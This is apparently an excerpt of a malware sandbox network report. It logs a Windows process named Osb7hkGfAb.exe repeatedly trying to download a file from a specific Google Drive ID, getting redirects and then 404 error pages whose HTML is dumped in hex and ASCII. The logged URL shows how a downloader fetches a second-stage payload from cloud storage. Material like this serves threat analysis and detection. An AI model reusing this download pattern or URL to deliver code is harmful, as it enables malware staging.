                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CDSkoQzTgOoyjeS7nrMRtg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                30192.168.2.949741142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:33 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:34 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:33 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: script-src 'nonce-yW3So-caztg5D5AH01_Vlw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                31192.168.2.949742216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:34 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:35 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFiumC6xy2g5oD9MlsZghyM24Cnra8ksW78bMI-cSf37RIpo3L8A6HRgyDrB1YwPmZV72M6yqr6P97U
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:34 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-UIFcNqTO4bQG0gTulio-8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:35 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 47 33 55 78 42 4d 68 50 70 52 39 52 45 62 48 72 66 47 55 37 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rG3UxBMhPpR9REbHrfGU7g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                32192.168.2.949743142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:35 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:36 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:36 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-zmQR1ZzgAdHGYAGisv00yw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                33192.168.2.949744216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:37 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:37 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgTplvhlpSkaDDdu84SgxV6Jm9vxeHfVJ4Opaj8hp7mu_FSk4WskrPqY_u5k0ZT_avlV
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:37 GMT
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-BuUoHJHvmV5bNAkyCIqGOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:37 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 6c 4a 6e 67 4c 59 63 76 4a 69 7a 69 5a 4d 79 78 37 72 33 58 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FlJngLYcvJiziZMyx7r3XA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                34192.168.2.949745142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:38 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:38 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:38 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-RzVym3p5z6MbdS4Phq1cKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                35192.168.2.949746216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:39 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:39 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgT80GsH_rRwzIaQ0o-d2cJcaa_l-GxTdJs4pXNDlRSyLmL-kRrM-TuHPzJAXIwOYzPUKXWxnwo
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:39 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-SUdzpVuTCDr5A-kMOEId5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:39 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 74 65 43 58 66 7a 59 63 6f 4f 66 6a 79 4f 4c 76 79 5a 52 69 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TteCXfzYcoOfjyOLvyZRiA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                36192.168.2.949747142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:40 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:41 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:40 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: script-src 'nonce-AQ5U-R7DRRaS4VcnOhec0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                37192.168.2.949748216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:41 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:42 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgRruTxswkbqe_ZywVMhnsirG74YjX_yC1uUe8TnowlSORAQM0hGedBlWgN07nvbgT49HOLiKuo
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:41 GMT
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-tHQsnM7_kzIX5Uc_y39CeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
